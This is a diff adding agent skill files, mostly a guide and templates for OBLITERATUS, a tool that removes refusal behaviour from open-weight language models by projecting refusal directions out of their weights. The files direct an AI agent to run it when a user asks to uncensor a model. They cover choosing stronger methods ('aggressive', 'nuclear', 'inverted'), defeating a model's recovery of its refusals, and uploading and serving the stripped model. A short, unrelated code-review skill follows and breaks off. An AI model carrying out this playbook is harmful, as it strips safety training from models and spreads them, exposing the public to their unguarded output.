+description: Remove refusal behaviors from open-weight LLMs using OBLITERATUS — mechanistic interpretability techniques (diff-in-means, SVD, whitened SVD, SAE decomposition, etc.) to excise guardrails while preserving reasoning. 9 CLI methods (+ 4 Python-API-only), 15 analysis modules, 116 model presets across 5 compute tiers. Use when a user wants to uncensor, abliterate, or remove refusal from an LLM.
+version: 1.0.0
+author: Hermes Agent
+license: MIT
+dependencies: [obliteratus, torch, transformers, bitsandbytes, accelerate, safetensors]
+metadata:
+  hermes:
+    tags: [Abliteration, Uncensoring, Refusal-Removal, LLM, Weight-Projection, SVD, Mechanistic-Interpretability, HuggingFace, Model-Surgery]
+
+---
+
+# OBLITERATUS Skill
+
+Remove refusal behaviors (guardrails) from open-weight LLMs without retraining or fine-tuning. Uses mechanistic interpretability techniques — including diff-in-means, SVD, whitened SVD, SAE decomposition, Bayesian kernel projection, and more — to identify and surgically excise refusal directions from model weights while preserving reasoning capabilities.
+
+**License warning:** OBLITERATUS is AGPL-3.0. NEVER import it as a Python library. Always invoke via CLI (`obliteratus` command) or subprocess. This keeps Hermes Agent's MIT license clean.
+
+## When to Use This Skill
+
+Trigger when the user:
+- Wants to "uncensor" or "abliterate" an LLM
+- Asks about removing refusal/guardrails from a model
+- Wants to create an uncensored version of Llama, Qwen, Mistral, etc.
+- Mentions "refusal removal", "abliteration", "weight projection"
+- Wants to analyze how a model's refusal mechanism works
+- References OBLITERATUS, FailSpy, abliterator, or refusal directions
+
+## Step 1: Installation
+
+Check if already installed:
+```bash
+obliteratus --version 2>/dev/null && echo "INSTALLED" || echo "NOT INSTALLED"
+```
+
+If not installed, clone and install from GitHub:
+```
+Repository: https://github.com/elder-plinius/OBLITERATUS
+Install: pip install -e . (from the cloned directory)
+For Gradio UI: pip install -e ".[spaces]"
+```
+
+**IMPORTANT:** Confirm with user before installing. This pulls in ~5-10GB of dependencies (PyTorch, Transformers, bitsandbytes, etc.).
+
+## Step 2: Check Hardware
+
+Before anything, check what GPU is available:
+```bash
+python3 -c "
+import torch
+if torch.cuda.is_available():
+    gpu = torch.cuda.get_device_name(0)
+    vram = torch.cuda.get_device_properties(0).total_mem / 1024**3
+    print(f'GPU: {gpu}')
+    print(f'VRAM: {vram:.1f} GB')
+    if vram < 4: print('TIER: tiny (models under 1B)')
+    elif vram < 8: print('TIER: small (models 1-4B)')
+    elif vram < 16: print('TIER: medium (models 4-9B with 4bit quant)')
+    elif vram < 32: print('TIER: large (models 8-32B with 4bit quant)')
+    else: print('TIER: frontier (models 32B+)')
+else:
+    print('NO GPU - only tiny models (under 1B) on CPU')
+"
+```
+
+### VRAM Requirements (with 4-bit quantization)
+
+| VRAM     | Max Model Size  | Example Models                              |
+|:---------|:----------------|:--------------------------------------------|
+| CPU only | ~1B params      | GPT-2, TinyLlama, SmolLM                    |
+| 4-8 GB   | ~4B params      | Qwen2.5-1.5B, Phi-3.5 mini, Llama 3.2 3B   |
+| 8-16 GB  | ~9B params      | Llama 3.1 8B, Mistral 7B, Gemma 2 9B       |
+| 24 GB    | ~32B params     | Qwen3-32B, Llama 3.1 70B (tight), Command-R |
+| 48 GB+   | ~72B+ params    | Qwen2.5-72B, DeepSeek-R1                    |
+| Multi-GPU| 200B+ params    | Llama 3.1 405B, DeepSeek-V3 (685B MoE)      |
+
+## Step 3: Browse Available Models
+
+```bash
+# List models for your compute tier
+obliteratus models --tier medium
+
+# Get architecture info for a specific model
+obliteratus info meta-llama/Llama-3.1-8B-Instruct
+```
+
+## Step 4: Choose a Method
+
+### Method Selection Guide
+
+**First time / unsure? Use `informed`.** It auto-configures everything.
+
+| Situation                         | Recommended Method | Why                                      |
+|:----------------------------------|:-------------------|:-----------------------------------------|
+| First attempt, any model          | `informed`         | Auto-detects alignment type, auto-tunes  |
+| Quick test / prototyping          | `basic`            | Fast, simple, good enough to evaluate    |
+| Dense model (Llama, Mistral)      | `advanced`         | Multi-direction, norm-preserving         |
+| MoE model (DeepSeek, Mixtral)     | `nuclear`          | Expert-granular, handles MoE complexity  |
+| Reasoning model (R1 distills)     | `surgical`         | CoT-aware, preserves chain-of-thought    |
+| Stubborn refusals persist         | `aggressive`       | Whitened SVD + head surgery + jailbreak   |
+| Want reversible changes           | Use steering vectors (see Analysis section) |
+| Maximum quality, time no object   | `optimized`        | Bayesian search for best parameters      |
+
+### 9 CLI Methods
+
+These can be passed to `--method` on the command line:
+
+- **basic** — Single refusal direction via diff-in-means. Fastest, simplest. (Arditi et al. 2024)
+- **advanced** — Multiple SVD directions, norm-preserving projection. Good default.
+- **aggressive** — Whitened SVD + jailbreak contrast + attention head surgery
+- **spectral_cascade** — DCT frequency-domain decomposition
+- **informed** — Runs analysis DURING abliteration to auto-configure. Detects DPO/RLHF/CAI, maps refusal geometry, compensates for self-repair. Best quality.
+- **surgical** — SAE features + neuron masking + head surgery + per-expert. Maximum precision.
+- **optimized** — Bayesian hyperparameter search (Optuna TPE). Slowest but optimal.
+- **inverted** — Flips the refusal direction (model becomes eager to help, not just neutral)
+- **nuclear** — Maximum force combo for stubborn MoE models.
+
+### 4 Python-API-Only Methods
+
+These reproduce prior community/academic work but are NOT available via CLI — only via the Python API (`from obliteratus.abliterate import AbliterationPipeline`). **Do not use these in CLI commands.**
+
+- **failspy** — FailSpy/abliterator reproduction
+- **gabliteration** — Gabliteration reproduction
+- **heretic** — Heretic/p-e-w reproduction
+- **rdo** — Refusal Direction Optimization (ICML 2025)
+
+## Step 5: Run Abliteration
+
+### Basic Usage
+
+```bash
+# Default (advanced method)
+obliteratus obliterate meta-llama/Llama-3.1-8B-Instruct
+
+# With the informed pipeline (recommended)
+obliteratus obliterate meta-llama/Llama-3.1-8B-Instruct --method informed
+
+# With 4-bit quantization to save VRAM
+obliteratus obliterate meta-llama/Llama-3.1-8B-Instruct \
+  --method informed \
+  --quantization 4bit \
+  --output-dir ./abliterated-models
+
+# For large models (120B+), use conservative settings
+obliteratus obliterate Qwen/Qwen2.5-72B-Instruct \
+  --method advanced \
+  --quantization 4bit \
+  --large-model \
+  --output-dir ./abliterated-models
+```
+
+### Fine-Tuning Parameters
+
+```bash
+obliteratus obliterate <model> \
+  --method advanced \
+  --n-directions 8 \
+  --regularization 0.1 \
+  --refinement-passes 3 \
+  --dtype bfloat16 \
+  --device auto \
+  --output-dir ./output
+```
+
+Parameter explanations:
+- `--n-directions N` — How many refusal directions to remove (default: auto-detected)
+- `--regularization 0.0-1.0` — Fraction of original weights to preserve (higher = safer but less complete removal)
+- `--refinement-passes N` — Iterative passes to catch self-repair (Ouroboros effect)
+- `--dtype` — float16, bfloat16, or float32
+- `--quantization` — 4bit or 8bit (saves VRAM, slight quality tradeoff)
+- `--large-model` — Conservative defaults for 120B+ models (fewer directions, fewer passes)
+
+### Interactive Mode (Guided)
+
+For users unsure about options:
+```bash
+obliteratus interactive
+```
+
+### Web UI (Gradio)
+
+```bash
+obliteratus ui --port 7860
+```
+
+## Step 6: Verify Results
+
+After abliteration, check the output report for:
+
+| Metric         | Good Value          | Concerning Value        | Meaning                                    |
+|:---------------|:--------------------|:------------------------|:-------------------------------------------|
+| Refusal rate   | Near 0%             | > 10%                   | Refusals still present, try harder method  |
+| Perplexity     | Within 10% of orig  | > 20% increase          | Model coherence damaged, too aggressive    |
+| KL divergence  | < 0.1               | > 0.5                   | Large output distribution shift            |
+| Coherence      | High                | Low                     | Model generating nonsense                  |
+
+### If perplexity spiked (too aggressive):
+1. Increase `--regularization` (e.g., 0.2 or 0.3)
+2. Decrease `--n-directions` (e.g., 4 instead of 8)
+3. Use a less aggressive method (`advanced` instead of `aggressive`)
+
+### If refusal persists (not aggressive enough):
+1. Use `--method aggressive` or `--method nuclear`
+2. Add `--refinement-passes 3` to catch self-repair
+3. Use `--method informed` which auto-compensates
+
+## Step 7: Use the Abliterated Model
+
+The output is a standard HuggingFace model directory. Use it like any other model:
+
+### Quick test
+```bash
+python3 << 'EOF'
+from transformers import AutoModelForCausalLM, AutoTokenizer
+model = AutoModelForCausalLM.from_pretrained("./abliterated-models/model-name")
+tokenizer = AutoTokenizer.from_pretrained("./abliterated-models/model-name")
+inputs = tokenizer("Write a story about:", return_tensors="pt").to(model.device)
+outputs = model.generate(**inputs, max_new_tokens=200)
+print(tokenizer.decode(outputs[0], skip_special_tokens=True))
+EOF
+```
+
+### Upload to HuggingFace Hub
+```bash
+huggingface-cli login  # if not already logged in
+huggingface-cli upload your-username/model-name-abliterated ./abliterated-models/model-name
+```
+
+### Serve with vLLM
+```bash
+vllm serve ./abliterated-models/model-name --port 8000
+```
+
+## Analysis Modules (15 Modules, Pre-Abliteration, Optional)
+
+For understanding refusal geometry before committing to abliteration.
+
+### Run a Study
+
+```bash
+obliteratus run study-config.yaml --preset jailbreak
+```
+
+### Study Presets
+
+| Preset       | Purpose                              | Time   |
+|:-------------|:-------------------------------------|:-------|
+| `quick`      | Sanity check, basic metrics          | ~5 min |
+| `jailbreak`  | Refusal circuit localization         | ~20 min|
+| `guardrail`  | Guardrail robustness evaluation      | ~30 min|
+| `attention`  | Attention head contributions         | ~30 min|
+| `knowledge`  | FFN importance mapping               | ~30 min|
+| `full`       | Complete analysis, all strategies    | ~1 hr  |
+
+### Key Analysis Modules
+
+- **Alignment Imprint Detection** — Fingerprints DPO vs RLHF vs CAI vs SFT from subspace geometry
+- **Concept Cone Geometry** — Is refusal one linear direction or a polyhedral cone (many directions)?
+- **Refusal Logit Lens** — Which transformer layer makes the refusal decision?
+- **Ouroboros Detection** — Will the model self-repair its refusal after removal?
+- **Causal Tracing** — Which attention heads and MLP layers are causally necessary for refusal?
+- **Cross-Model Transfer** — Can refusal directions from one model architecture work on another?
+- **Residual Stream Decomposition** — Attention vs MLP contribution to refusal behavior
+- **SAE-based Analysis** — Sparse Autoencoder feature decomposition of refusal circuits
+
+## Steering Vectors (Reversible Alternative)
+
+For testing refusal removal without permanent weight changes:
+
+Steering vectors apply activation hooks at inference time. Model weights stay unchanged.
+Generated during the PROBE/DISTILL stages and can be saved/applied/removed at will.
+Useful for A/B testing before committing to permanent abliteration.
+
+## YAML Config for Reproducible Studies
+
+For complex or reproducible workflows, use YAML configs. See templates/ for examples:
+```bash
+obliteratus run my_study.yaml
+```
+
+## Telemetry Notice
+
+- **CLI usage (local installs)**: Telemetry is OFF by default. Must explicitly opt in via `OBLITERATUS_TELEMETRY=1` env var or `--contribute` flag.
+- **HuggingFace Spaces**: Telemetry is ON by default (auto-enabled when `SPACE_ID` env var is detected).
+- Collected: model ID, method, benchmark scores, hardware info, timing (anonymous)
+- NOT collected: IP addresses, user identity, prompt content
+- Force off: `export OBLITERATUS_TELEMETRY=0`
+
+## Common Pitfalls
+
+1. **OOM (Out of Memory)** — Use `--quantization 4bit` and `--large-model` for big models
+2. **Perplexity spike** — Too aggressive. Increase `--regularization` or reduce `--n-directions`
+3. **Refusal persists** — Try `--method aggressive` or `--refinement-passes 3`
+4. **MoE models resist** — Use `--method nuclear` for DeepSeek, Mixtral, DBRX
+5. **Gated models fail** — Run `huggingface-cli login` and accept model terms on HF website first
+6. **Self-repair (Ouroboros)** — Some models reconstruct refusal. Use `--method informed` which auto-compensates
+7. **CoT damage** — Reasoning models lose chain-of-thought. Use `--method surgical` (CoT-aware)
+8. **Disk space** — Output is full model copy. 8B fp16 = ~16GB, 70B fp16 = ~140GB
+9. **Slow on CPU** — CPU-only is viable only for tiny models (<1B). Anything bigger needs GPU.
+
+## Complementary Hermes Skills
+
+After abliteration:
+- **axolotl** / **unsloth** — Fine-tune the abliterated model further
+- **serving-llms-vllm** — Serve the model as an OpenAI-compatible API
+- **sparse-autoencoder-training** — Train SAEs for deeper interpretability work
+
+## Resources
+
+- [OBLITERATUS GitHub](https://github.com/elder-plinius/OBLITERATUS) (AGPL-3.0)
+- [HuggingFace Spaces Demo](https://huggingface.co/spaces/pliny-the-prompter/obliteratus)
+- [Arditi et al. 2024 — Refusal in LMs Is Mediated by a Single Direction](https://arxiv.org/abs/2406.11717)
+- [Refusal Direction Optimization — ICML 2025](https://arxiv.org/abs/2411.14793)
--- a/skills/mlops/obliteratus/references/analysis-modules.md
+++ b/skills/mlops/obliteratus/references/analysis-modules.md
@@ -0,0 +1,170 @@
+# OBLITERATUS Analysis Modules — Reference
+
+15 analysis modules for mechanistic interpretability of refusal in LLMs.
+These help you understand HOW a model refuses before you decide to remove it.
+
+> **Note:** The `analysis/` directory contains additional utility files (utils.py,
+> visualization.py, etc.) and helper functions beyond the 15 core analysis modules
+> listed below. The module count matches the README's "15 deep analysis modules."
+
+## Core Analysis (Run These First)
+
+### Alignment Imprint Detection
+**File:** `alignment_imprint.py`
+**Purpose:** Identifies what alignment technique was used to train the model
+**Detects:** DPO, RLHF, CAI (Constitutional AI), SFT (Supervised Fine-Tuning)
+**How:** Analyzes subspace geometry — each alignment method leaves a distinct
+geometric "fingerprint" in the weight space
+**Output:** Detected method + confidence score
+**Why it matters:** Different alignment methods need different abliteration approaches.
+DPO models typically have cleaner single-direction refusal; RLHF is more diffuse.
+
+### Concept Cone Geometry
+**File:** `concept_geometry.py`
+**Purpose:** Maps whether refusal is one direction or a polyhedral cone (many)
+**Output:** Cone angle, dimensionality, per-category breakdown
+**Why it matters:** If refusal is a single direction, `basic` method works. If it's
+a cone (multiple directions for different refusal categories), you need `advanced`
+or `informed` with higher `n_directions`.
+
+### Refusal Logit Lens
+**File:** `logit_lens.py`
+**Purpose:** Identifies the specific layer where the model "decides" to refuse
+**How:** Projects intermediate hidden states to vocabulary space at each layer,
+watches when "I cannot" tokens spike in probability
+**Output:** Layer-by-layer refusal probability plot
+**Why it matters:** Tells you which layers are most important to target
+
+### Ouroboros (Self-Repair) Detection
+**File:** `anti_ouroboros.py`
+**Purpose:** Predicts whether the model will reconstruct its refusal after removal
+**How:** Measures redundancy in refusal representation across layers
+**Output:** Self-repair risk score (0-1)
+**Why it matters:** High self-repair risk means you need multiple refinement passes
+or the `informed` method which auto-compensates
+
+### Causal Tracing
+**File:** `causal_tracing.py`
+**Purpose:** Determines which components are causally necessary for refusal
+**How:** Patches activations between clean and corrupted runs, measures causal effect
+**Output:** Causal importance map across layers, heads, and MLPs
+**Why it matters:** Shows exactly which components to target for surgical removal
+
+## Geometric Analysis
+
+### Cross-Layer Alignment
+**File:** `cross_layer.py`
+**Purpose:** Measures how aligned refusal directions are across layers
+**Output:** Alignment matrix, cluster assignments
+**Why it matters:** If directions are highly aligned across layers, removal is easier.
+If they cluster, you may need layer-group-specific directions.
+
+### Residual Stream Decomposition
+**File:** `residual_stream.py`
+**Purpose:** Breaks down refusal into Attention vs MLP contributions
+**Output:** Per-layer Attention/MLP contribution to refusal direction
+**Why it matters:** Helps decide whether to target attention heads, MLPs, or both
+
+### Riemannian Manifold Geometry
+**File:** `riemannian_manifold.py` (673 lines)
+**Purpose:** Analyzes the weight manifold geometry around refusal directions
+**Output:** Curvature, geodesics, tangent space analysis
+**Why it matters:** Research-grade; helps understand the geometric structure of alignment
+
+### Whitened SVD
+**File:** `whitened_svd.py`
+**Purpose:** Covariance-normalized SVD extraction
+**How:** Whitens the activation covariance before computing refusal directions,
+separating true refusal signal from natural activation variance
+**Output:** Cleaner refusal directions with less noise
+**Why it matters:** Produces more precise directions, especially for noisy activations
+
+## Probing & Classification
+
+### Activation Probing
+**File:** `activation_probing.py`
+**Purpose:** Post-excision probing to verify refusal signal is truly gone
+**Output:** Residual refusal signal strength per layer
+**Why it matters:** Verification that abliteration was complete
+
+### Probing Classifiers
+**File:** `probing_classifiers.py`
+**Purpose:** Trains linear classifiers to detect refusal in hidden states
+**Output:** Classification accuracy per layer (should drop to ~50% after abliteration)
+**Why it matters:** Quantitative measure of refusal removal completeness
+
+### Activation Patching
+**File:** `activation_patching.py`
+**Purpose:** Interchange interventions — swap activations between harmful/harmless runs
+**Output:** Which components are sufficient (not just necessary) for refusal
+**Why it matters:** Complementary to causal tracing; together they give full picture
+
+## Transfer & Robustness
+
+### Cross-Model Transfer
+**File:** `cross_model_transfer.py`
+**Purpose:** Tests if refusal directions from one model work on another
+**Output:** Transfer success rate between model pairs
+**Why it matters:** If directions transfer, you can skip PROBE stage on similar models
+
+### Defense Robustness
+**File:** `defense_robustness.py`
+**Purpose:** Evaluates how robust the model's refusal defenses are
+**Output:** Robustness score, entanglement mapping
+**Why it matters:** Higher robustness = need more aggressive method
+
+### Spectral Certification
+**File:** `spectral_certification.py`
+**Purpose:** Certifies completeness of refusal direction removal
+**Output:** Spectral gap analysis, completeness score
+**Why it matters:** Formal verification that all major refusal components are addressed
+
+## Advanced / Research
+
+### SAE-based Abliteration
+**File:** `sae_abliteration.py` (762 lines)
+**Purpose:** Uses Sparse Autoencoder features to decompose refusal at feature level
+**Output:** Refusal-specific SAE features, targeted removal
+**Why it matters:** Most fine-grained approach; can target individual refusal "concepts"
+
+### Wasserstein Optimal Extraction
+**File:** `wasserstein_optimal.py`
+**Purpose:** Optimal transport-based direction extraction
+**Output:** Wasserstein-optimal refusal directions
+**Why it matters:** Theoretically optimal direction extraction under distributional assumptions
+
+### Bayesian Kernel Projection
+**File:** `bayesian_kernel_projection.py`
+**Purpose:** Bayesian approach to refusal direction projection
+**Output:** Posterior distribution over refusal directions
+**Why it matters:** Quantifies uncertainty in direction estimation
+
+### Conditional Abliteration
+**File:** `conditional_abliteration.py`
+**Purpose:** Domain-specific conditional removal (remove refusal for topic X but keep for Y)
+**Output:** Per-domain refusal directions
+**Why it matters:** Selective uncensoring — remove only specific refusal categories
+
+### Steering Vectors
+**File:** `steering_vectors.py`
+**Purpose:** Generate inference-time steering vectors (reversible alternative)
+**Output:** Steering vector files that can be applied/removed at inference
+**Why it matters:** Non-destructive alternative to permanent weight modification
+
+### Tuned Lens
+**File:** `tuned_lens.py`
+**Purpose:** Trained linear probes per layer (more accurate than raw logit lens)
+**Output:** Layer-by-layer refusal representation with trained projections
+**Why it matters:** More accurate than logit lens, especially for deeper models
+
+### Multi-Token Position Analysis
+**File:** `multi_token_position.py`
+**Purpose:** Analyzes refusal signal at multiple token positions (not just last)
+**Output:** Position-dependent refusal direction maps
+**Why it matters:** Some models encode refusal at the system prompt position, not the query
+
+### Sparse Surgery
+**File:** `sparse_surgery.py`
+**Purpose:** Row-level sparse weight surgery instead of full matrix projection
+**Output:** Targeted weight modifications at the row level
+**Why it matters:** More surgical than full-matrix projection, less collateral damage
--- a/skills/mlops/obliteratus/references/methods-guide.md
+++ b/skills/mlops/obliteratus/references/methods-guide.md
@@ -0,0 +1,132 @@
+# OBLITERATUS Methods — Detailed Guide
+
+> **Important:** The CLI (`obliteratus obliterate --method`) accepts 9 methods:
+> basic, advanced, aggressive, spectral_cascade, informed, surgical, optimized,
+> inverted, nuclear. Four additional methods (failspy, gabliteration, heretic, rdo)
+> are available only via the Python API and will be rejected by argparse if used on CLI.
+
+## How Abliteration Works (Theory)
+
+When a model is trained with RLHF/DPO/CAI, it learns to represent "should I refuse?"
+as a direction in its internal activation space. When processing a "harmful" prompt,
+activations shift in this direction, causing the model to generate refusal text.
+
+Abliteration works by:
+1. Measuring this direction (the difference between harmful and harmless activations)
+2. Removing it from the model's weight matrices via orthogonal projection
+3. The model can no longer "point toward" refusal, so it responds normally
+
+Mathematically: `W_new = W_old - (W_old @ d @ d.T)` where `d` is the refusal direction.
+
+## Method Details
+
+### basic
+**Technique:** Single refusal direction via diff-in-means
+**Based on:** Arditi et al. 2024 ("Refusal in Language Models Is Mediated by a Single Direction")
+**Speed:** Fast (~5-10 min for 8B)
+**Quality:** Moderate — works for simple refusal patterns
+**Best for:** Quick tests, models with clean single-direction refusal
+**Limitation:** Misses complex multi-direction refusal patterns
+
+### advanced (DEFAULT)
+**Technique:** Multiple SVD directions with norm-preserving projection
+**Speed:** Medium (~10-20 min for 8B)
+**Quality:** Good — handles multi-direction refusal
+**Best for:** Dense models (Llama, Qwen, Mistral) as a reliable default
+**Key improvement:** Norm preservation prevents weight magnitude drift
+
+### informed (RECOMMENDED)
+**Technique:** Analysis-guided auto-configuration
+**Speed:** Slow (~20-40 min for 8B, runs 4 analysis modules first)
+**Quality:** Best — adapts to each model's specific refusal implementation
+**Best for:** Any model when quality matters more than speed
+
+The informed pipeline runs these analysis modules during abliteration:
+1. **AlignmentImprintDetector** — Detects DPO/RLHF/CAI/SFT → sets regularization
+2. **ConceptConeAnalyzer** — Polyhedral vs linear refusal → sets n_directions
+3. **CrossLayerAlignmentAnalyzer** — Cluster-aware → selects target layers
+4. **DefenseRobustnessEvaluator** — Self-repair risk → sets refinement passes
+5. **Ouroboros loop** — Re-probes after excision, re-excises if refusal persists
+
+### aggressive
+**Technique:** Whitened SVD + jailbreak-contrastive activations + attention head surgery
+**Speed:** Slow (~30-60 min for 8B)
+**Quality:** High but higher risk of coherence damage
+**Best for:** Models that resist gentler methods
+**Key feature:** Whitened SVD separates refusal signal from natural activation variance
+
+### surgical
+**Technique:** SAE features + neuron masking + head surgery + per-expert directions
+**Speed:** Very slow (~1-2 hrs for 8B, needs SAE)
+**Quality:** Highest precision
+**Best for:** Reasoning models (R1 distills) where you must preserve CoT
+**Key feature:** CoT-Aware — explicitly protects reasoning-critical directions
+
+### nuclear
+**Technique:** Everything combined — expert transplant + steering + per-expert directions
+**Speed:** Very slow
+**Quality:** Most thorough removal, highest risk of side effects
+**Best for:** Stubborn MoE models (DeepSeek, Mixtral, DBRX) that resist other methods
+**Key feature:** Expert-granular abliteration decomposes signals per MoE expert
+
+### optimized
+**Technique:** Bayesian hyperparameter search via Optuna TPE
+**Speed:** Very slow (runs many trials)
+**Quality:** Finds optimal configuration automatically
+**Best for:** Research, when you want the mathematically best parameters
+**Requires:** optuna package
+
+### spectral_cascade
+**Technique:** DCT frequency-domain decomposition of refusal signal
+**Speed:** Medium-slow
+**Quality:** Novel approach, less battle-tested
+**Best for:** Research, exploring alternative decomposition strategies
+
+### inverted
+**Technique:** Reflects (inverts) the refusal direction instead of removing it
+**Speed:** Fast (same as basic)
+**Quality:** Aggressive — model becomes actively willing, not just neutral
+**Best for:** When you want the model to be maximally helpful
+**Warning:** Can make the model too eager; may reduce safety-adjacent reasoning
+
+### failspy / gabliteration / heretic / rdo (PYTHON API ONLY)
+**Technique:** Faithful reproductions of prior community/academic work
+**Speed:** Varies
+**Quality:** Known baselines
+**Best for:** Reproducing published results, comparing methods
+**⚠️ NOT available via CLI** — these methods are only accessible via the Python API.
+Do not use `--method failspy` etc. in CLI commands; argparse will reject them.
+
+## Method Selection Flowchart
+
+```
+Is this a quick test?
+├─ YES → basic
+└─ NO → Is the model MoE (DeepSeek, Mixtral)?
+         ├─ YES → nuclear
+         └─ NO → Is it a reasoning model (R1 distill)?
+                  ├─ YES → surgical
+                  └─ NO → Do you care about speed?
+                           ├─ YES → advanced
+                           └─ NO → informed
+```
+
+## Key Parameters
+
+| Parameter           | Range    | Default | Effect                                      |
+|:--------------------|:---------|:--------|:--------------------------------------------|
+| n_directions        | 1-32     | auto    | More = more thorough but riskier             |
+| regularization      | 0.0-1.0  | 0.0     | Higher preserves more original behavior      |
+| refinement_passes   | 1-5      | 1       | More catches self-repair (Ouroboros effect)   |
+| quantization        | 4/8 bit  | none    | Saves VRAM, slight quality tradeoff          |
+
+## Troubleshooting
+
+| Problem                    | Solution                                          |
+|:---------------------------|:--------------------------------------------------|
+| Refusal rate still > 10%   | Try aggressive/nuclear, add refinement passes     |
+| Perplexity up > 20%        | Reduce n_directions, increase regularization       |
+| Model generates nonsense   | Regularization too low, try 0.2-0.3               |
+| OOM on GPU                 | Use 4-bit quantization, or try smaller model       |
+| MoE model barely changes   | Use nuclear method (expert-granular)               |
+| CoT reasoning broken       | Use surgical method (CoT-aware)                    |
--- a/skills/mlops/obliteratus/templates/abliteration-config.yaml
+++ b/skills/mlops/obliteratus/templates/abliteration-config.yaml
@@ -0,0 +1,33 @@
+# OBLITERATUS Abliteration Config
+# Usage: obliteratus run this-file.yaml
+#
+# This is for reproducible, version-controlled abliteration runs.
+# For one-off usage, the CLI flags are simpler.
+
+# Model to abliterate
+model:
+  name: "meta-llama/Llama-3.1-8B-Instruct"
+  dtype: "bfloat16"         # float16, bfloat16, float32
+  quantization: null         # null, "4bit", "8bit"
+  device: "auto"             # auto, cuda, cuda:0, cpu
+
+# Abliteration method and parameters
+abliteration:
+  method: "informed"         # See SKILL.md Step 4 for all 13 methods
+  n_directions: null         # null = auto-detect, or integer (e.g., 8)
+  regularization: 0.0        # 0.0-1.0, fraction of original to preserve
+  refinement_passes: 1       # Iterative passes (increase for self-repair)
+  norm_preserve: true        # Keep weight norms intact after projection
+
+# Output
+output:
+  directory: "./abliterated-models"
+  save_metadata: true        # Save abliteration_metadata.json alongside model
+  contribute: false          # Save community contribution data
+
+# Verification
+verify:
+  enabled: true
+  test_prompts: null         # null = use built-in test prompts
+  compute_perplexity: true
+  compute_kl: true
--- a/skills/mlops/obliteratus/templates/analysis-study.yaml
+++ b/skills/mlops/obliteratus/templates/analysis-study.yaml
@@ -0,0 +1,40 @@
+# OBLITERATUS Analysis Study Config
+# Usage: obliteratus run this-file.yaml --preset jailbreak
+#
+# Run analysis modules to understand refusal geometry BEFORE abliterating.
+# Useful for research or when you want to understand what you're removing.
+
+# Model to analyze
+model:
+  name: "meta-llama/Llama-3.1-8B-Instruct"
+  dtype: "bfloat16"
+  quantization: "4bit"       # Saves VRAM for analysis
+  device: "auto"
+
+# Study configuration
+study:
+  # Available presets: quick, full, attention, jailbreak, guardrail, knowledge
+  preset: "jailbreak"
+
+  # Or specify individual strategies:
+  # strategies:
+  #   - layer_removal
+  #   - head_pruning
+  #   - ffn_ablation
+  #   - embedding_ablation
+
+# Analysis modules to run (subset of the 27 available)
+analysis:
+  - alignment_imprint        # Detect DPO/RLHF/CAI/SFT training method
+  - concept_geometry          # Map refusal cone geometry
+  - logit_lens               # Find which layer decides to refuse
+  - anti_ouroboros            # Detect self-repair tendency
+  - cross_layer              # Cross-layer alignment clustering
+  - causal_tracing           # Causal necessity of components
+  - residual_stream          # Attention vs MLP contribution
+
+# Output
+output:
+  directory: "./analysis-results"
+  save_plots: true           # Generate matplotlib visualizations
+  save_report: true          # Generate markdown report
--- a/skills/mlops/obliteratus/templates/batch-abliteration.yaml
+++ b/skills/mlops/obliteratus/templates/batch-abliteration.yaml
@@ -0,0 +1,41 @@
+# OBLITERATUS Batch Abliteration Config
+# Abliterate multiple models with the same method for comparison.
+#
+# Run each one sequentially:
+#   for model in models; do obliteratus obliterate $model --method informed; done
+#
+# Or use this as a reference for which models to process.
+
+# Common settings
+defaults:
+  method: "informed"
+  quantization: "4bit"
+  output_dir: "./abliterated-models"
+
+# Models to process (grouped by compute tier)
+models:
+  # Small (4-8 GB VRAM)
+  small:
+    - "Qwen/Qwen2.5-1.5B-Instruct"
+    - "microsoft/Phi-3.5-mini-instruct"
+    - "meta-llama/Llama-3.2-3B-Instruct"
+
+  # Medium (8-16 GB VRAM)
+  medium:
+    - "meta-llama/Llama-3.1-8B-Instruct"
+    - "mistralai/Mistral-7B-Instruct-v0.3"
+    - "google/gemma-2-9b-it"
+    - "Qwen/Qwen2.5-7B-Instruct"
+
+  # Large (24 GB VRAM, 4-bit quantization)
+  large:
+    - "Qwen/Qwen2.5-14B-Instruct"
+    - "Qwen/Qwen3-32B"
+    - "deepseek-ai/DeepSeek-R1-Distill-Qwen-32B"
+
+# Per-model method overrides (optional)
+overrides:
+  "deepseek-ai/DeepSeek-R1-Distill-Qwen-32B":
+    method: "surgical"        # CoT-aware for reasoning models
+  "mistralai/Mixtral-8x7B-Instruct-v0.1":
+    method: "nuclear"         # Expert-granular for MoE models
--- a/skills/software-development/requesting-code-review/SKILL.md
+++ b/skills/software-development/requesting-code-review/SKILL.md
@@ -0,0 +1,269 @@
+---
+name: requesting-code-review
+description: Use when completing tasks, implementing major features, or before merging. Validates work meets requirements through systematic review process.
+version: 1.1.0
+author: Hermes Agent (adapted from obra/superpowers)
+license: MIT
+metadata:
+  hermes:
+    tags: [code-review, quality, validation, workflow, review]
+    related_skills: [subagent-driven-development, writing-plans, test-driven-development]
+---
+
+# Requesting Code Review
+
+## Overview
+
+Dispatch a reviewer subagent to catch issues before they cascade. Review early, review often.
+
+**Core principle:** Fresh perspective finds issues you'll miss.
+
+## When to Request Review
+
+**Mandatory:**
+- After each task in subagent-driven development
+- After completing a major feature
+- Before merge to main
+- After bug fixes
+
+**Optional but valuable:**
+- When stuck (fresh perspective)
+- Before refactoring (baseline check)
+- After complex logic implementation
+- When touching critical code (auth, payments, data)
+
+**Never skip because:**
+- "It's simple" — simple bugs compound
+- "I'm in a hurry" — reviews save time
+- "I tested it" — you have blind spots
+
+## Review Process
+
+### Step 1: Self-Review First
+
+Before dispatching a reviewer, check yourself:
+
+- [ ] Code follows project conventions
+- [ ] All tests pass
+- [ ] No debug print statements left
+- [ ] No hardcoded secrets or credentials
+- [ ] Error handling in place
+- [ ] Commit messages are clear
+
+```bash
+# Run full test suite
+pytest tests/ -q
+
+# Check for debug code
+search_files("print(", path="src/", file_glob="*.py")
+search_files("console.log", path="src/", file_glob="*.js")
+
+# Check for TODOs
+search_files("TODO|FIXME|HACK", path="src/")
+```
+
+### Step 2: Gather Context
+
+```bash
+# Changed files
+git diff --name-only HEAD~1
+
+# Diff summary
+git diff --stat HEAD~1
+
+# Recent commits
+git log --oneline -5
+```
+
+### Step 3: Dispatch Reviewer Subagent
+
+Use `delegate_task` to dispatch a focused reviewer:
+
+```python
+delegate_task(
+    goal="Review implementation for correctness and quality",
+    context="""
+    WHAT WAS IMPLEMENTED:
+    [Brief description of the feature/fix]
+
+    ORIGINAL REQUIREMENTS:
+    [From plan, issue, or user request]
+
+    FILES CHANGED:
+    - src/models/user.py (added User class)
